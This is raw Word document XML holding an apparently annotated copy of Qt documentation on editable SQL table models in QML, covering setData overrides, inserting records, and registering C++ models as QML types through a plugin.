            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt::EditRole</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, before calling the parent class version:</w:t>
      </w:r>
      <w:r w:rsidR="00A0139F">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A0139F">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="00A0139F" w:rsidRPr="00A0139F">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidR="00A0139F">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</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kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bool</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SqlEditableModel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setData</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>const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QModelIndex</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&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>item</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const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QVariant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&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>value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int</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> role</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if</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item</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isValid</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&amp;&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> role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Qt</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>::</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>EditRole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QSqlTableModel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setData</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item</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value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role</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emit dataChanged</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item</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item</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return</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true</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return</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false</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p>
    <w:p w:rsidR="0088385D" w:rsidRPr="0088385D" w:rsidRDefault="0088385D" w:rsidP="0088385D">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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6F5A30">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
      <w:r w:rsidR="006F5A30" w:rsidRPr="006F5A30">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006F5A30">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>It is important to emit the</w:t>
      </w:r>
      <w:r w:rsidR="006F5A30" w:rsidRPr="006F5A30">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2654" w:anchor="dataChanged" w:history="1">
        <w:r w:rsidRPr="006F5A30">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>dataChanged</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006F5A30">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>() signal after saving the changes.</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Unlike the C++ item views such as</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2655" w:history="1">
        <w:r w:rsidRPr="0088385D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QListView</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2656" w:history="1">
        <w:r w:rsidRPr="0088385D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QTableView</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, the</w:t>
      </w:r>
      <w:r w:rsidR="006F5A30">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>setData()</w:t>
      </w:r>
      <w:r w:rsidR="006F5A30">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">method </w:t>
      </w:r>
      <w:r w:rsidRPr="00991333">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>must be explicitly invoked from QML whenever appropriate</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. For </w:t>
      </w:r>
      <w:r w:rsidRPr="00991333">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, on the</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2657" w:anchor="editingFinished-signal" w:history="1">
        <w:r w:rsidRPr="0088385D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>editingFinished</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>() or</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2658" w:anchor="accepted-signal" w:history="1">
        <w:r w:rsidRPr="0088385D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>accepted</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>() signal of</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2659" w:history="1">
        <w:r w:rsidRPr="0088385D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>TextField</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Depending on the</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2660" w:anchor="EditStrategy-enum" w:history="1">
        <w:r w:rsidRPr="00991333">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="FF0000"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>EditStrategy</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">used by the model, the changes are either queued for </w:t>
      </w:r>
      <w:r w:rsidRPr="00991333">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>submission later or submitted immediately</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>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You can also insert new data into the model by calling</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2661" w:anchor="insertRecord" w:history="1">
        <w:r w:rsidRPr="00991333">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QSqlTableModel::insertRecord</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00991333">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">). In the following </w:t>
      </w:r>
      <w:r w:rsidRPr="00991333">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> snippet, a</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2662" w:history="1">
        <w:r w:rsidRPr="0088385D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QSqlRecord</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is populated with book details and appended to the model:</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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QSqlRecord</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> newRecord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record</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newRecord</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setValue</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"author"</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"John Grisham"</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newRecord</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setValue</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"booktitle"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"The Litigators"</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insertRecord</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rowCount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newRecord</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88385D">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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rsidP="006F5A30">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2372" w:name="exposing-c-data-models-to-qml"/>
      <w:bookmarkStart w:id="2373" w:name="_Toc483001041"/>
      <w:bookmarkStart w:id="2374" w:name="_Toc483004030"/>
      <w:bookmarkStart w:id="2375" w:name="_Toc483604382"/>
      <w:bookmarkStart w:id="2376" w:name="_Toc483605602"/>
      <w:bookmarkEnd w:id="2372"/>
      <w:r w:rsidRPr="006F5A30">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Exposing C++ Data Models to QML</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2373"/>
      <w:bookmarkEnd w:id="2374"/>
      <w:bookmarkEnd w:id="2375"/>
      <w:bookmarkEnd w:id="2376"/>
    </w:p>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The above examples use</w:t>
      </w:r>
      <w:r w:rsidR="00991333">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2663" w:anchor="setContextProperty" w:history="1">
        <w:r w:rsidRPr="00991333">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQmlContext::setContextProperty</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00991333">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to set model values directly in QML components. An </w:t>
      </w:r>
      <w:r w:rsidRPr="00991333">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>alternative</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to this is to </w:t>
      </w:r>
      <w:r w:rsidRPr="00991333">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>register the C++ model class as a QML type</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (either</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2664" w:history="1">
        <w:r w:rsidRPr="00991333">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>directly</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">from a C++ entry-point, </w:t>
      </w:r>
      <w:r w:rsidRPr="00991333">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>or within the initialization function of a</w:t>
      </w:r>
      <w:r w:rsidRPr="00991333">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2665" w:history="1">
        <w:r w:rsidRPr="00991333">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QML C++ plugin</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, as shown below). This would allow the model classes to be created directly as types within QML:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="10048"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431"/>
        <w:gridCol w:w="8617"/>
      </w:tblGrid>
      <w:tr w:rsidR="00991333" w:rsidRPr="0088385D" w:rsidTr="00991333">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88385D" w:rsidRPr="0088385D" w:rsidRDefault="0088385D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0088385D">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>C++</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8617"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kwd"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FFFF55"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>class</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MyModelPlugin</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public</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QQmlExtensionPlugin</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Q_OBJECT</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Q_PLUGIN_METADATA</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IID </w:t>
            </w:r>
            <w:r w:rsidRPr="0088385D">
              <w:rPr>
                <w:rStyle w:val="str"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="AAAAAA"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>"org.qt-project.QmlExtension.MyModel"</w:t>
            </w:r>
            <w:r w:rsidRPr="0088385D">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> FILE </w:t>
            </w:r>
            <w:r w:rsidRPr="0088385D">
              <w:rPr>
                <w:rStyle w:val="str"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="AAAAAA"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>"mymodel.json"</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kwd"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FFFF55"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>public</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void</w:t>
            </w:r>
            <w:r w:rsidRPr="0088385D">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
